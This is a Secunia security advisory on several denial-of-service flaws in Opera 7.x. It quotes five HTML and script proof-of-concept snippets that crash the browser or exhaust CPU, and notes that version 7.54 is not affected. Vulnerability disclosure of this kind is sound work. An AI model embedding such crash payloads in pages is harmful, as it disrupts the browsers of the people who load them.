Secunia

Multiple DoS (Denial of Service) issues have been reported in the Opera browser.

A malicious person can exploit these to either crash the browser due to some NULL pointer dereference bugs or in some cases make it consume vast amounts of CPU resources.

The following five examples was provided in the original advisory:

#1
<!DOCTYPE[NULL byte]A>

#2
<form></form><script>document.forms[0].submit()</script>

#3
<table>
<tr id="crash" style="display:inline"><td>
<script>crash.style.display = "none";</script>
</td></tr>
</table>

#4
<table>
<map id="crash" style="position:absolute"></map>
<script>crash.style.height = crash.style.width = '0';</script>
</table>

#5
<html>
<head>
<style type="text/css">
<!--
.aaaaa:after{content:"A";display:block}
.bbbbb{display:run-in}
.ccccc{display:inline-block}
//-->
</style>
</head>
<body>
<div class="aaaaa">
<div class="bbbbb">
<div class="ccccc">
</div>
</div>
</div>
</body>
</html>


The issues have been reported in the following versions for Windows:

7.11b build 2887
7.11 build 2880
7.10 build 2840
7.03 build 2670


However, Secunia has also been able to confirm the issues in version 7.11 for Linux. Prior versions may also be affected.

Solution
The issues do not affect version 7.54.
Further details available in Customer Area

Provided and/or discovered by
imagine and nesumin, :: Operash ::

Changelog
Further details available in Customer Area

Deep Links
Links available in Customer Area